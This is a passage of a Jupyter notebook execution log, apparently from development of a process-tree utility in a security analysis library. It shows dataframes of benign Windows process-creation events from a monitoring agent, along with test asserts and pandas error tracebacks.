\nc:\\windows\\system32\\conhost.exe0x12782019-02-09... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... WORKGROUP \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... WORKGROUP \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 0x3e7 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 0x3e7 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x183c ... \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 0x21c8 ... \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 0x1c24 ... \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 0x17a4 ... \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 0x1c10 ... \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 0x235c ... \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 0x1468 ... \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 0x1278 ... \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 0xbc ... \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 0x1834 ... \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 0x15f4 ... \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 0xfd4 ... \n\n source_index_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 998.0 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 749.0 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 883.0 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 549.0 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 478.0 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 553.0 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 848.0 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 850.0 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 984.0 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 738.0 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 736.0 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 887.0 \n\n ProcessId_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x864 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 0x864 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 0x864 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 0x864 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 0x864 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 0x864 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 0x864 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 0x864 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 0x864 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 0x864 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 0x864 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 0x864 \n\n NewProcessName_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.256999936 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.260000000 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.256999936 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.252999936 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.270000128 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.270000128 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.260000000 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.263000064 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.247000064 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.260000000 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.260000000 \n\n parent_key \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... False True False \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... False True False \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... False True False \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... False True False \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... False True False \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... False True False \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... False True False \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... False True False \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... False True False \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... False True False \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... False True False \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... False True False \n\n path parent_index \nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 1004/10/11 10 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 1004/107/108 107 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 1004/120/121 120 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 1004/127/128 127 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 1004/129/130 129 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 1004/139/140 139 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 1004/15/16 15 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 1004/5/6 5 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 1004/67/68 67 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 1004/76/77 76 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 1004/78/79 78 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 1004/8/9 8 \n\n[12 rows x 35 columns]" }, "execution_count": 14, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "depth = full_tree[\"path\"].str.count(\"/\").max() + 1\nfull_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]" }, "executionTime": "2019-12-13T20:44:21.327Z" }, { "cell": { "executionCount": 15, "executionEventId": "7483fa17-ca0b-4a03-93a4-db1ae7ac1659", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "SyntaxError", "evalue": "invalid syntax (, line 6)", "output_type": "error", "traceback": [ "\u001b[1;36m File \u001b[1;32m\"\"\u001b[1;36m, line \u001b[1;32m6\u001b[0m\n\u001b[1;33m assert len(children) = 13\u001b[0m\n\u001b[1;37m ^\u001b[0m\n\u001b[1;31mSyntaxError\u001b[0m\u001b[1;31m:\u001b[0m invalid syntax\n" ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) = 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nptutil.get_ancestors(p_tree, bottom_desc)\n# ptutil.get_parent\n# ptutil.get_process\n# ptutil.build_process_key\n# ptutil.infer_schema\n# ptutil.get_root\n# ptutil.get_root_tree\n# ptutil.get_siblings\n# ptutil.get_summary_info" }, "executionTime": "2019-12-13T20:46:04.028Z" }, { "cell": { "executionCount": 16, "executionEventId": "df326a6a-0280-44ee-bb8d-38dafffd51a5", "hasError": false, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01 00:00:00.000MSTICAlertsWin1NaNNaNNaN0x3e70x864...NaNNaNNaNNaTNaNTrueFalseFalse1004NaN
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x8dc...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/101004
c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.27300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.273MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x183c...998.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 21:02:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/10/1110
\n

3 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273 \n\n Computer \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\program files\\microsoft monitoring agent\\age... 0x864 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x8dc ... \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x183c ... \n\n source_index_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 998.0 \n\n ProcessId_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x864 \n\n NewProcessName_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaT \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936 \n\n parent_key \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... True False False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... False True False \n\n path parent_index \nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1004 NaN \nc:\\program files\\microsoft monitoring agent\\age... 1004/10 1004 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 1004/10/11 10 \n\n[3 rows x 35 columns]" }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nptutil.get_ancestors(p_tree, bottom_desc)\n# ptutil.get_parent\n# ptutil.get_process\n# ptutil.build_process_key\n# ptutil.infer_schema\n# ptutil.get_root\n# ptutil.get_root_tree\n# ptutil.get_siblings\n# ptutil.get_summary_info" }, "executionTime": "2019-12-13T20:46:10.173Z" }, { "cell": { "executionCount": 17, "executionEventId": "d9eb868d-7f9b-4b0d-b219-cbba01689e02", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount WORKGROUP\\MSTICAlertsWin1$\nEventID 4688\nTimeGenerated 2019-02-09 21:02:56.273000\nComputer MSTICAlertsWin1\nSubjectUserSid S-1-5-18\nSubjectUserName MSTICAlertsWin1$\nSubjectDomainName WORKGROUP\nSubjectLogonId 0x3e7\nNewProcessId 0x183c\nNewProcessName C:\\Windows\\System32\\conhost.exe\nTokenElevationType %%1936\nProcessId 0x8dc\nCommandLine \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...\nParentProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId 0x0\nSourceComputerId 263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc 2019-02-09 21:02:56.273000\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\windows\\system32\\conhost.exe\nparent_proc_lc c:\\program files\\microsoft monitoring agent\\ag...\nsource_index 11\nNewProcessId_par 0x8dc\nEffectiveLogonId_par 0x3e7\nnew_process_lc_par c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par 998\nProcessId_par 0x864\nNewProcessName_par C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTimeGenerated_orig_par 2019-02-09 21:02:56.256999936\nparent_key c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot False\nIsLeaf True\nIsBranch False\npath 1004/10/11\nparent_index 10\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: object" }, "execution_count": 17, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "bottom_desc" }, "executionTime": "2019-12-13T20:48:02.822Z" }, { "cell": { "executionCount": 18, "executionEventId": "74355753-d7d8-40a0-92cf-1967bc92e8b0", "hasError": true, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "ename": "KeyError", "evalue": "'11'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mKeyError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m 2896\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2897\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 2898\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;31mKeyError\u001b[0m: '11'", "\nDuring handling of the above exception, another exception occurred:\n", "\u001b[1;31mKeyError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m\"11\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_process\u001b[1;34m(procs, source)\u001b[0m\n\u001b[0;32m 567\u001b[0m \"\"\"\n\u001b[0;32m 568\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msource\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mstr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 569\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mprocs\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0msource\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 570\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msource\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mSeries\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 571\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0msource\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py\u001b[0m in \u001b[0;36m__getitem__\u001b[1;34m(self, key)\u001b[0m\n\u001b[0;32m 1422\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1423\u001b[0m \u001b[0mmaybe_callable\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mapply_if_callable\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mobj\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1424\u001b[1;33m \u001b[1;32mreturn\u001b[0m 